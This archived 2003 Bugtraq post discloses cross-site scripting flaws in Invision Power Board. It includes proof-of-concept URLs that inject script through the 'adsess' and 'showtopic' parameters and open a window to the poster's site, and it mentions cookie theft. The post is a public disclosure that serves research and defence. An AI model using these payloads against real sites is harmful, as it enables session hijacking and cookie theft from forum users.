lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 9 Sep 2003 19:15:19 -0000 From: Boy Bear <eyal067@...la.co.il> To: bugtraq@...urityfocus.com Subject: bug in Invision Power Board >I found possibility to run Script (java Script, VBScript) on the system >Invision Power Board... >It's possible to do if it much {many} things like a withdrawal of >cookie, >advertising .... > > >For example: > >http://forums.invisionpower.com/admin.php? >adsess='><script>window.open >(window.location.search.substring >(78));</script><http://binaryvision.tech.nu? >BoyBear$$$From$$$BinaryVision > > > > > >BoyBear From BinaryVision ( http://binaryvision.tech.nu ) > >http://www.securityfocus.com/archive/1/332461/2003-08-07/2003-08-13/0 The bug the previous fix but ..... http://forums.invisionpower.com/index.php?showtopic='><script>window.open (window.location.search.substring(79)) </script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision BoyBear From BinaryVision ( http://binaryvision.tech.nu )